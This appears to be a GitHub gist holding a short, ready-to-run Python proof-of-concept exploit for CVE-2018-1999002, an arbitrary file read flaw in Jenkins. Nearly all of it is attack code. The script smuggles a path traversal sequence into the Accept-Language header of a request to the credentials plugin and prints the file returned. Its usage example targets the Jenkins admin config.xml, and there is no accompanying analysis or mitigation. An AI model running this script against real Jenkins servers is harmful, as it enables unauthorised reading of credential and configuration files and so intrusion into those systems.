-
-
Save kasunbg/ce76a50d02ec808a0913e1491da4218f to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import sys | |
import os | |
PLUGIN = 'credentials' | |
BACKDIR_COUNT = 10 | |
if len(sys.argv) != 3: | |
print 'usage:\n\tpython CVE-2018-1999002.py [jenkins base url] [absolute file path]' | |
print '' | |
print 'exemple:\n\tpython CVE-2018-1999002.py http://localhost:8080/ "/Program Files (x86)/Jenkins/users/admin/config.xml"' | |
sys.exit(1) | |
base_url = sys.argv[1] | |
file_path = sys.argv[2] | |
if file_path[0] == '/': | |
file_path = file_path[1:] | |
file_name, file_ext = os.path.splitext(file_path) | |
assert file_ext, "The file path must have an extension" | |
headers = { 'Accept-Language': ('../' * BACKDIR_COUNT) + file_name } | |
res = requests.get(os.path.join(base_url, 'plugin', PLUGIN, file_ext), headers=headers) | |
if res.status_code == 200: | |
print res.content | |
else: | |
print 'Failed with HTTP code %d' % res.status_code |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment